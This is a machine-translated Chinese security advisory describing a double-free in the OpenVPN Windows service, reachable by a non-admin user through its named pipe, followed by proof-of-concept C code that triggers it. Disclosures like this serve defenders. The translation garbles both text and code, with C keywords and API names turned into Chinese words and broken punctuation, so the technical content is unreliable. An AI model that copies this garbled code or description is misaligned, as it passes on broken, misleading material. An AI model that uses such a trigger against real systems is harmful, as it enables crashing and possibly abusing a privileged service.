(R1) OpenVPN Windows服务免费的两倍

窗户安装OpenVPN的分成三个部分:

1. OpenVPN服务(openvpnserv.exe)
2. 用户态OpenVPN (openvpn.exe)
3. 用户界面

项目分解以这种方式使非管理用户可以建立VPN连接。用户界面与OpenVPN服务通信管道和服务产生的实例openvpn.exe当不再需要升级特权。

恶意用户可以通过管道发送畸形数据为了触发一个免费的两倍。只提供一个空结尾字符串会导致服务进入一个错误触发的初始自由的状态数据指针的函数GetStartupData。然而,一个悬空指针仍在GETSTARTUPDATA结构体。这个悬空指针后释放在连接清理导致未定义的行为。

下面的代码可以用来繁殖的问题:

处理pipeHandle =它仅仅(_T(“\ \ \ \ \ \管。\ \ openvpn \ \服务”),GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);如果(pipeHandle = = INVALID_HANDLE_VALUE){返回EXIT_FAILURE;}DWORD dwMode = PIPE_READMODE_MESSAGE;如果(!SetNamedPipeHandleState (pipeHandle &dwMode, NULL, NULL)){返回EXIT_FAILURE;}DWORD rwTotal = 0;WCHAR init_message [] = L“测试”;如果(!WriteFile (pipeHandle init_message, sizeof (init_message) &rwTotal, NULL)){返回EXIT_FAILURE;}rwTotal = 0; char data[1024] = { 0 }; bool success = false; do { success = ReadFile(pipeHandle, data, sizeof(data), &rwTotal, NULL); if (!success && GetLastError() != ERROR_MORE_DATA) { break; } } while (!success); return 0;